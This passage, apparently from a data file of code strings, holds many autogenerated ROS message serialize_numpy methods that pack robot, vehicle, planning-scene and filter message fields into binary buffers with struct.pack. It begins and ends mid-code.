unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val3.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.slot_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val2.receivers_name)\n buff.write(_struct_I.pack(length))\n for val3 in val2.receivers_name:\n length = len(val3)\n if python3 or type(val3) == unicode:\n val3 = val3.encode('utf-8')\n length = len(val3)\n 
buff.write(struct.pack('<I%ss'%length, length, val3))\n buff.write(_struct_f.pack(val1.altitude))\n _v5 = val1.target_position\n _x = _v5\n buff.write(_struct_4f.pack(_x.latitude, _x.longitude, _x.altitude, _x.heading))\n buff.write(_struct_b.pack(val1.strategy))\n _v6 = val1.duration\n _x = _v6\n buff.write(_struct_2i.pack(_x.secs, _x.nsecs))\n _x = val1\n buff.write(_struct_2fBf.pack(_x.radius, _x.circle_altitude, _x.clockwise, _x.direction))\n length = len(self.move_transitions)\n buff.write(_struct_I.pack(length))\n for val1 in self.move_transitions:\n buff.write(_struct_B.pack(val1.is_choice))\n _x = val1.wait_for_slot_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.from_move_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.to_move_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_B.pack(val1.fluid))\n _x = val1.condition_identifier\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.false_branch_move_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.slot_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.slot_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n buff.write(_struct_b.pack(self.travel_mode))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_56B().pack(_x.command, _x.set_num, _x.paraset_byte54, _x.paraset_byte53, _x.paraset_byte52, _x.paraset_byte51, _x.paraset_byte50, _x.paraset_byte49, _x.paraset_byte48, _x.paraset_byte47, _x.paraset_byte46, _x.paraset_byte45, _x.paraset_byte44, _x.paraset_byte43, _x.paraset_byte42, _x.paraset_byte41, _x.paraset_byte40, _x.paraset_byte39, _x.paraset_byte38, _x.paraset_byte37, _x.paraset_byte36, _x.paraset_byte35, _x.paraset_byte34, _x.paraset_byte33, _x.paraset_byte32, _x.paraset_byte31, _x.paraset_byte30, _x.paraset_byte29, _x.paraset_byte28, _x.paraset_byte27, _x.paraset_byte26, _x.paraset_byte25, _x.paraset_byte24, _x.paraset_byte23, _x.paraset_byte22, _x.paraset_byte21, _x.paraset_byte20, _x.paraset_byte19, _x.paraset_byte18, _x.paraset_byte17, _x.paraset_byte16, _x.paraset_byte15, _x.paraset_byte14, _x.paraset_byte13, _x.paraset_byte12, _x.paraset_byte11, _x.paraset_byte10, _x.paraset_byte9, _x.paraset_byte8, _x.paraset_byte7, _x.paraset_byte6, _x.paraset_byte5, _x.paraset_byte4, _x.paraset_byte3, _x.paraset_byte2, _x.paraset_byte1))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', 
self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_didid.pack(_x.distance_front, _x.angle_front, _x.distance_back, _x.angle_back, _x.turn_left))\n _x = self.turn_left_sensor\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_d.pack(self.turn_right))\n _x = self.turn_right_sensor\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_6f.pack(_x.major_ax, _x.minor_ax, _x.coup_strength, _x.limit_cycle, _x.forward_velocity, _x.curvature))\n length = len(self.x_offset)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.x_offset.tostring())\n length = len(self.y_offset)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.y_offset.tostring())\n length = len(self.coupling_1)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(self.coupling_1.tostring())\n length = len(self.coupling_2)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(self.coupling_2.tostring())\n length = len(self.coupling_3)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(self.coupling_3.tostring())\n length = len(self.coupling_4)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(self.coupling_4.tostring())\n length = len(self.coupling_5)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(self.coupling_5.tostring())\n length = len(self.coupling_6)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(self.coupling_6.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.compatibility\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.display_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.namespace\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.icon.resource_name\n length = 
len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.icon.format\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.icon.data\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.remappings)\n buff.write(_struct_I.pack(length))\n for val1 in self.remappings:\n _x = val1.remap_from\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.remap_to\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.parameters\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.max))\n _x = self.pairing.rapp\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.pairing.remappings)\n buff.write(_struct_I.pack(length))\n for val1 in self.pairing.remappings:\n _x = val1.remap_from\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.remap_to\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.pairing.parameters)\n buff.write(_struct_I.pack(length))\n for val1 in self.pairing.parameters:\n _x = val1.key\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.hash))\n _x = self.role\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), 
str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_5B6fi2f().pack(_x.enable_steering, _x.enable_braking, _x.enable_driving, _x.enable_Estop, _x.enable_gear, _x.sw_deg, _x.sw_rad, _x.speed_ms, _x.speed_kms, _x.ax_ms2, _x.omega_rad, _x.gear_mode, _x.steering, _x.speed))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_QBdB2I().pack(_x.step_num, _x.info_type, _x.predict.step_dt, _x.predict.trans_jacobian.column_major, _x.predict.trans_jacobian.rows, _x.predict.trans_jacobian.cols))\n length = len(self.predict.trans_jacobian.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.predict.trans_jacobian.data.tostring())\n _x = self\n buff.write(_get_struct_B2I().pack(_x.predict.trans_noise_cov.column_major, _x.predict.trans_noise_cov.rows, _x.predict.trans_noise_cov.cols))\n length = len(self.predict.trans_noise_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.predict.trans_noise_cov.data.tostring())\n _x = self\n buff.write(_get_struct_B2I().pack(_x.predict.prior_state_cov.column_major, _x.predict.prior_state_cov.rows, _x.predict.prior_state_cov.cols))\n length = len(self.predict.prior_state_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.predict.prior_state_cov.data.tostring())\n _x = self\n buff.write(_get_struct_B2I().pack(_x.predict.post_state_cov.column_major, _x.predict.post_state_cov.rows, _x.predict.post_state_cov.cols))\n length = len(self.predict.post_state_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.predict.post_state_cov.data.tostring())\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.prior_state_cov.column_major, _x.update.prior_state_cov.rows, _x.update.prior_state_cov.cols))\n length = len(self.update.prior_state_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.update.prior_state_cov.data.tostring())\n length = len(self.update.prior_obs_error)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.update.prior_obs_error.tostring())\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.obs_error_cov.column_major, _x.update.obs_error_cov.rows, _x.update.obs_error_cov.cols))\n length = len(self.update.obs_error_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.update.obs_error_cov.data.tostring())\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.post_state_cov.column_major, _x.update.post_state_cov.rows, _x.update.post_state_cov.cols))\n length = len(self.update.post_state_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n 
buff.write(self.update.post_state_cov.data.tostring())\n length = len(self.update.state_delta)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.update.state_delta.tostring())\n length = len(self.update.post_obs_error)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.update.post_obs_error.tostring())\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.obs_jacobian.column_major, _x.update.obs_jacobian.rows, _x.update.obs_jacobian.cols))\n length = len(self.update.obs_jacobian.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.update.obs_jacobian.data.tostring())\n _x = self\n buff.write(_get_struct_B2I().pack(_x.update.obs_noise_cov.column_major, _x.update.obs_noise_cov.rows, _x.update.obs_noise_cov.cols))\n length = len(self.update.obs_noise_cov.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.update.obs_noise_cov.data.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3I().pack(_x.x.header.seq, _x.x.header.stamp.secs, _x.x.header.stamp.nsecs))\n _x = self.x.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_7d3I().pack(_x.x.pose.position.x, _x.x.pose.position.y, _x.x.pose.position.z, _x.x.pose.orientation.x, _x.x.pose.orientation.y, _x.x.pose.orientation.z, _x.x.pose.orientation.w, _x.x_desi.header.seq, _x.x_desi.header.stamp.secs, _x.x_desi.header.stamp.nsecs))\n _x = self.x_desi.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_7d3I().pack(_x.x_desi.pose.position.x, _x.x_desi.pose.position.y, _x.x_desi.pose.position.z, _x.x_desi.pose.orientation.x, _x.x_desi.pose.orientation.y, _x.x_desi.pose.orientation.z, _x.x_desi.pose.orientation.w, _x.x_desi_filtered.header.seq, _x.x_desi_filtered.header.stamp.secs, _x.x_desi_filtered.header.stamp.nsecs))\n _x = self.x_desi_filtered.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_31d().pack(_x.x_desi_filtered.pose.position.x, _x.x_desi_filtered.pose.position.y, _x.x_desi_filtered.pose.position.z, _x.x_desi_filtered.pose.orientation.x, _x.x_desi_filtered.pose.orientation.y, _x.x_desi_filtered.pose.orientation.z, _x.x_desi_filtered.pose.orientation.w, _x.x_err.linear.x, _x.x_err.linear.y, _x.x_err.linear.z, _x.x_err.angular.x, _x.x_err.angular.y, _x.x_err.angular.z, _x.xd.linear.x, _x.xd.linear.y, _x.xd.linear.z, _x.xd.angular.x, _x.xd.angular.y, _x.xd.angular.z, _x.xd_desi.linear.x, _x.xd_desi.linear.y, _x.xd_desi.linear.z, 
_x.xd_desi.angular.x, _x.xd_desi.angular.y, _x.xd_desi.angular.z, _x.F.force.x, _x.F.force.y, _x.F.force.z, _x.F.torque.x, _x.F.torque.y, _x.F.torque.z))\n length = len(self.tau_pose)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.tau_pose.tostring())\n length = len(self.tau_posture)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.tau_posture.tostring())\n length = len(self.tau)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.tau.tostring())\n length = len(self.J.layout.dim)\n buff.write(_struct_I.pack(length))\n for val1 in self.J.layout.dim:\n _x = val1.label\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_get_struct_2I().pack(_x.size, _x.stride))\n buff.write(_get_struct_I().pack(self.J.layout.data_offset))\n length = len(self.J.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.J.data.tostring())\n length = len(self.N.layout.dim)\n buff.write(_struct_I.pack(length))\n for val1 in self.N.layout.dim:\n _x = val1.label\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_get_struct_2I().pack(_x.size, _x.stride))\n buff.write(_get_struct_I().pack(self.N.layout.data_offset))\n length = len(self.N.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.N.data.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.object1\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.object2\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_di.pack(_x.penetration_distance, _x.operation))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.planning_scene_diff.robot_state.joint_state.header.seq, _x.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs))\n _x = self.planning_scene_diff.robot_state.joint_state.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.planning_scene_diff.robot_state.joint_state.name)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.joint_state.name:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.robot_state.joint_state.position)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n 
buff.write(self.planning_scene_diff.robot_state.joint_state.position.tostring())\n length = len(self.planning_scene_diff.robot_state.joint_state.velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.planning_scene_diff.robot_state.joint_state.velocity.tostring())\n length = len(self.planning_scene_diff.robot_state.joint_state.effort)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.planning_scene_diff.robot_state.joint_state.effort.tostring())\n _x = self\n buff.write(_struct_2I.pack(_x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.nsecs))\n length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.poses)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.poses:\n _v57 = val1.position\n _x = _v57\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v58 = val1.orientation\n _x = _v58\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene_diff.fixed_frame_transforms)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.fixed_frame_transforms:\n _v59 = val1.header\n buff.write(_struct_I.pack(_v59.seq))\n _v60 = _v59.stamp\n _x = _v60\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v59.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.child_frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v61 = val1.transform\n _v62 = _v61.translation\n _x = _v62\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v63 = _v61.rotation\n _x = _v63\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene_diff.allowed_collision_matrix.link_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.allowed_collision_matrix.link_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.allowed_collision_matrix.entries)\n buff.write(_struct_I.pack(length))\n for val1 in 
self.planning_scene_diff.allowed_collision_matrix.entries:\n length = len(val1.enabled)\n buff.write(_struct_I.pack(length))\n pattern = '<%sB'%length\n buff.write(val1.enabled.tostring())\n length = len(self.planning_scene_diff.allowed_contacts)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.allowed_contacts:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v64 = val1.shape\n buff.write(_struct_b.pack(_v64.type))\n length = len(_v64.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(_v64.dimensions.tostring())\n length = len(_v64.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(_v64.triangles.tostring())\n length = len(_v64.vertices)\n buff.write(_struct_I.pack(length))\n for val3 in _v64.vertices:\n _x = val3\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v65 = val1.pose_stamped\n _v66 = _v65.header\n buff.write(_struct_I.pack(_v66.seq))\n _v67 = _v66.stamp\n _x = _v67\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v66.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v68 = _v65.pose\n _v69 = _v68.position\n _x = _v69\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v70 = _v68.orientation\n _x = _v70\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(val1.link_names)\n buff.write(_struct_I.pack(length))\n for val2 in val1.link_names:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.pack('<I%ss'%length, length, val2))\n buff.write(_struct_d.pack(val1.penetration_depth))\n length = len(self.planning_scene_diff.link_padding)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.link_padding:\n _x = val1.link_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_d.pack(val1.padding))\n length = len(self.planning_scene_diff.collision_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.collision_objects:\n _v71 = val1.header\n buff.write(_struct_I.pack(_v71.seq))\n _v72 = _v71.stamp\n _x = _v72\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v71.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(val1.padding))\n _v73 = val1.operation\n buff.write(_struct_b.pack(_v73.operation))\n length = len(val1.shapes)\n buff.write(_struct_I.pack(length))\n for val2 in val1.shapes:\n buff.write(_struct_b.pack(val2.type))\n length = len(val2.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(val2.dimensions.tostring())\n length = len(val2.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(val2.triangles.tostring())\n length = len(val2.vertices)\n buff.write(_struct_I.pack(length))\n for val3 in val2.vertices:\n _x = val3\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n length = 
len(val1.poses)\n buff.write(_struct_I.pack(length))\n for val2 in val1.poses:\n _v74 = val2.position\n _x = _v74\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v75 = val2.orientation\n _x = _v75\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene_diff.attached_collision_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.attached_collision_objects:\n _x = val1.link_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v76 = val1.object\n _v77 = _v76.header\n buff.write(_struct_I.pack(_v77.seq))\n _v78 = _v77.stamp\n _x = _v78\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v77.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v76.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n 